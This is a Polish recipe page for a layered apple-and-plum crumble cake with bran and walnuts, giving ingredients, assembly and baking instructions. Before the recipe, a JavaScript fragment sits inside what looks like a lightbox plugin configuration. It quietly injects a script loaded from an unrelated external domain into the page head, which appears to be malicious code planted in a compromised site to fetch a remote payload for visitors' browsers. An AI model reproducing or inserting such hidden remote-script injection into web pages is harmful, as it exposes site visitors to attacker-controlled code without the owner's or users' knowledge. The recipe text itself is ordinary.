, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Zasypane śliwki w szarlotce

Wydrukuj artykuł Wydrukuj artykuł

Zasypane śliwki w szarlotce

Szarlotka sypana szybko zyskała wielu fanów w naszej Rodzince, dlatego piekę ją często na różne sposoby. Ostatnio wrzuciłam do niej śliwki i wzbogaciłam w błonnik… efekt powalający!

Składniki:

  • 1/2 szklanki mąki pszennej zwykłej
  • 1/2 szklanki mąki pszennej razowej
  • 1/4 szklanki otrąb żytnich
  • 3/4 szklanki kaszy manny
  • 3/4 szklanki cukru
  • 1  łyżeczka proszku do pieczenia
  • 0,5 kg jabłek, najlepiej kwaśnych
  • 1 kg śliwek (około – tyle by pokryć całą blachę)
  • cynamon
  • 3/4 kostki masła (około 170 g)
  • garść orzechów włoskich w dużych kawałkach

Mąkę, cukier, kaszę, otręby i proszek do pieczenia wymieszać w misce.

Jabłka obrać, wydrążyć gniazda nasienne pokroić na niezbyt małe kawałki. Ze śliwek wydrążyć pestki pokroić na ćwiartki (lub na połówki gdy śliwki są małe). Spód tortownicy o średnicy 26 wyłożyć papierem do pieczenia. Boki wysmarować masłem.

Na dno formy wysypać 1/3 suchych składników, na nie rozłożyć kawałki jabłek, oprószyć cynamonem. Posypać połową pozostałych suchych składników. Następnie rozłożyć równomiernie śliwki, oprószyć cynamonem i posypać orzechami. Na wierzch wysypać pozostałą część suchych składników.

Plasterki masła rozłożyć równomiernie na wierzchu ciasta. Masło najlepiej wcześniej dobrze schłodzić, np. przez 10 min w zamrażarce.

Włożyć do piekarnika rozgrzanego do temp. 200ºC . Piec 90 minut. Spód blachy warto zabezpieczyć folią aluminiową, większą formą lub blachą (położoną poziom niżej w piekarniku), ponieważ nadmiar soku lub tłuszczu może wydostać się z tortownicy.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony